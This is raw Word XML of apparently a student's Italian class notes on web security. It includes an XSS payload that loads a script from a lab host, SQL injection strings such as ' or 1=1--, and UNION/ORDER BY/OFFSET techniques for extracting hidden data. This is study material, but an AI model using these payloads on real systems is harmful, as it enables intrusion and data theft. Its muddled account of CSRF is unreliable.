        <w:t>updateDetails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> si riduce a:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{ “name”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:”&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">= ‘http://localhost:8000/p.js’&gt;&lt;/script&gt;” } (al posto di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> si può </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usarte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> anche l’indirizzo della macchina che sta ostando lo script esempio posso usare 192.168.86.130:8080 che è l’indirizzo del server, p.js è lo script che abbiamo salvato prima)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FCEC5A" w14:textId="77777777" w:rsidR="00BF2802" w:rsidRPr="00BF2802" w:rsidRDefault="00BF2802" w:rsidP="00BF2802"/>
    <w:p w14:paraId="5A8BE3BB" w14:textId="1CAEE59B" w:rsidR="0016422E" w:rsidRDefault="00A83845" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Guardare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ArcTriks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7C73A" w14:textId="77777777" w:rsidR="00A83845" w:rsidRDefault="00A83845" w:rsidP="000616BC"/>
    <w:p w14:paraId="7BA6B7CF" w14:textId="45840352" w:rsidR="00A83845" w:rsidRDefault="00A83845" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">CSRF è un’altra misura di mitigazione per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="074470F7" w14:textId="44156A06" w:rsidR="00A83845" w:rsidRDefault="00A83845" w:rsidP="000616BC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> serve a mitigare (difendere) il problema del </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> step di oggi, si lega ogni chiamata all’endpoint ad un cookie (un token </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>piu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> precisamente) che protegge la chiamata, cambiando continuamente. Per fare una richiesta valida devi per forza conoscere il token. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Puo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> essere passato come campo nascosto (non so cosa intenda);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9A98C" w14:textId="6BD39ED1" w:rsidR="00A83845" w:rsidRDefault="00A83845" w:rsidP="000616BC">
      <w:r>
        <w:t>l’applicazione che utilizziamo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5352F0AF" w14:textId="77777777" w:rsidR="00A83845" w:rsidRDefault="00A83845" w:rsidP="000616BC"/>
    <w:p w14:paraId="34ABC656" w14:textId="0151F8E4" w:rsidR="00A83845" w:rsidRDefault="00A83845" w:rsidP="000616BC">
      <w:r>
        <w:t>Ogni volta che viene fatto login viene generato un X-CRF token (nelle best practice</w:t>
      </w:r>
      <w:r w:rsidR="00A31840">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEF07D8" w14:textId="26634544" w:rsidR="00A31840" w:rsidRDefault="00A31840" w:rsidP="000616BC">
      <w:r>
        <w:t>Devo scoprire dove si trova sto XCRF-token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C7F8BC" w14:textId="73455361" w:rsidR="00A31840" w:rsidRDefault="00A31840" w:rsidP="000616BC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>swisskeyrepo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -&gt; repo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con cose utili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB94549" w14:textId="68B95DE4" w:rsidR="00A83845" w:rsidRDefault="00A31840" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Potrebbe essere nascosto in un campo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, se è così ogni volta che la pagina viene caricata viene inserito il tag xml, e per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prenderelo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bisogna usare name=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> il nostro codice, fare la GET e poi passarlo al server ogni volta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315FDFF5" w14:textId="3B2021AB" w:rsidR="00A31840" w:rsidRDefault="00A31840" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c’è un laboratorio su XCRF-token. -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>facciaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AE62273" w14:textId="77777777" w:rsidR="008961D6" w:rsidRDefault="008961D6" w:rsidP="000616BC"/>
    <w:p w14:paraId="11C3DD83" w14:textId="4E9930E5" w:rsidR="008961D6" w:rsidRPr="008961D6" w:rsidRDefault="008961D6" w:rsidP="000616BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008961D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C969912" w14:textId="10FE75D6" w:rsidR="008961D6" w:rsidRDefault="008961D6" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Spesso nei server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> si usa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqllite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che è </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>built</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-in al posto di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E39FF0" w14:textId="43B5DC66" w:rsidR="008961D6" w:rsidRDefault="00DA609F" w:rsidP="000616BC">
      <w:r w:rsidRPr="00DA609F">
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA609F">
        <w:t>students</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA609F">
        <w:t xml:space="preserve"> WHERE name LIKE ‘’ or 1=1 -&gt; mi restituisce tutti gli </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA609F">
        <w:t>student</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA609F">
        <w:t xml:space="preserve"> perché 1=1 è sempre vera</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B9C5B" w14:textId="074C1265" w:rsidR="00DA609F" w:rsidRDefault="00DA609F" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Nella barra di ricerca se inserisco ‘ mi da errore perché ci sarà un apice in più, se invece voglio eliminare questo errore basta scrivere ‘—così i due trattini </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comenteranno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> l’apice in più, posso mettere anche ‘ or 1=1—e restituirà comunque tutti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C12EBA" w14:textId="4E6BC250" w:rsidR="00DA609F" w:rsidRPr="00DA609F" w:rsidRDefault="00DA609F" w:rsidP="000616BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA609F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL-injection UNION BASED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2475E1" w14:textId="69254D64" w:rsidR="00DA609F" w:rsidRDefault="00DA609F" w:rsidP="000616BC">
      <w:r w:rsidRPr="00DA609F">
        <w:t>La troviamo sull’app che c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ondivide su </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>teams</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 11/12/24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F0201" w14:textId="49A3F3C8" w:rsidR="00DA609F" w:rsidRDefault="00DA609F" w:rsidP="000616BC">
      <w:r>
        <w:t>Facciamo un’unione tra il risultato della query e qualcosa che vogliamo noi, anche info riservate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F7CAB" w14:textId="1BEA14F3" w:rsidR="00DA609F" w:rsidRDefault="00783B57" w:rsidP="000616BC">
      <w:r>
        <w:t>La parte fondamentale sta nel capire che simbolo è usato a chiusura della query per mettere nella barra di ricerca quello che vogliamo aggiungendo anche criteri di ricerca.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA42479" w14:textId="6C71ED9A" w:rsidR="00783B57" w:rsidRDefault="00783B57" w:rsidP="000616BC">
      <w:r>
        <w:t>Per scoprire quante colonne abbiamo possiamo usare un ORDER BY n e incrementare n ogni volta finché non da errore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C05493F" w14:textId="73A1D4A6" w:rsidR="00783B57" w:rsidRDefault="00783B57" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">Apriamo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>swisskeyrepo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e cerchiamo SQL e troviamo i payload specifici per i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (anche </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arctriks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079376F2" w14:textId="548A64B6" w:rsidR="00783B57" w:rsidRDefault="00B03D51" w:rsidP="000616BC">
      <w:r w:rsidRPr="00B03D51">
        <w:t xml:space="preserve">LIMIT n in SQL limita </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> set, tuttavia restituirà sempre il primo che trova, come facciamo a prenderci </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hidden_note</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602CD209" w14:textId="565A0B0F" w:rsidR="00B03D51" w:rsidRDefault="00B03D51" w:rsidP="000616BC">
      <w:r>
        <w:t xml:space="preserve">LIMIT 1 OFFSET 1 -&gt; trovo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hidden_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tramite la query che mi restituisce tutte le colonne del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B85A4C0" w14:textId="76C27D32" w:rsidR="00B03D51" w:rsidRDefault="00B03D51" w:rsidP="000616BC">
      <w:r>
        <w:t>Quindi in questo caso con OFFSET riesco a scorrere le colonne del DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A859A0" w14:textId="77777777" w:rsidR="00B03D51" w:rsidRPr="00B03D51" w:rsidRDefault="00B03D51" w:rsidP="000616BC"/>
    <w:p w14:paraId="642AB83A" w14:textId="77777777" w:rsidR="00783B57" w:rsidRPr="00B03D51" w:rsidRDefault="00783B57" w:rsidP="000616BC"/>
    <w:p w14:paraId="061A0856" w14:textId="77777777" w:rsidR="00783B57" w:rsidRPr="00B03D51" w:rsidRDefault="00783B57" w:rsidP="000616BC"/>
    <w:p w14:paraId="642E2516" w14:textId="77777777" w:rsidR="000616BC" w:rsidRPr="00B03D51" w:rsidRDefault="000616BC" w:rsidP="000616BC"/>
    <w:p w14:paraId="2792D088" w14:textId="77777777" w:rsidR="000616BC" w:rsidRPr="00B03D51" w:rsidRDefault="000616BC"/>
    <w:p w14:paraId="7E2BCC9B" w14:textId="77777777" w:rsidR="00DA609F" w:rsidRPr="00B03D51" w:rsidRDefault="00DA609F" w:rsidP="00DA609F"/>
    <w:p w14:paraId="72D346AD" w14:textId="77777777" w:rsidR="00DA609F" w:rsidRPr="00B03D51" w:rsidRDefault="00DA609F" w:rsidP="00DA609F"/>
    <w:p w14:paraId="18B4F8B8" w14:textId="77777777" w:rsidR="00DA609F" w:rsidRPr="00B03D51" w:rsidRDefault="00DA609F" w:rsidP="00DA609F"/>
    <w:p w14:paraId="7CEB5A58" w14:textId="77777777" w:rsidR="00DA609F" w:rsidRPr="00B03D51" w:rsidRDefault="00DA609F" w:rsidP="00DA609F"/>
    <w:p w14:paraId="536B3E4C" w14:textId="77777777" w:rsidR="00DA609F" w:rsidRPr="00B03D51" w:rsidRDefault="00DA609F" w:rsidP="00DA609F"/>
    <w:p w14:paraId="7DBF78BC" w14:textId="77777777" w:rsidR="00DA609F" w:rsidRPr="00B03D51" w:rsidRDefault="00DA609F" w:rsidP="00DA609F"/>
    <w:sectPr w:rsidR="00DA609F" w:rsidRPr="00B03D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F57BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="170A5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3949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BC"/>
    <w:rsid w:val="0001575D"/>
    <w:rsid w:val="000616BC"/>
    <w:rsid w:val="0016422E"/>
    <w:rsid w:val="0021111E"/>
    <w:rsid w:val="002C5EA0"/>
    <w:rsid w:val="006B105E"/>
    <w:rsid w:val="00783B57"/>
    <w:rsid w:val="008961D6"/>
    <w:rsid w:val="009001A8"/>
    <w:rsid w:val="009A60D7"/>
    <w:rsid w:val="00A31840"/>
    <w:rsid w:val="00A83845"/>
    <w:rsid w:val="00B03D51"/>
    <w:rsid w:val="00BF2802"/>
    <w:rsid w:val="00D1612A"/>
    <w:rsid w:val="00D37E8F"/>
    <w:rsid w:val="00DA609F"/>
    <w:rsid w:val="00DB35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CD2E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7F4EB530-FD1F-4350-AC27-2C3F0209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61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616B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616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616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616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616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616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616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16B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616B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616B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616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616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616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616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616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616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061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16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616B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616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616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616BC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000616BC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="000616BC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00061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616BC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentointenso">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="000616BC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000616BC"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Menzionenonrisolta">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000616BC"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentovisitato">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000616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867</Words>
  <Characters>4947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Murfuni</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Giovanni Murfuni</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-11T14:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-11T17:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>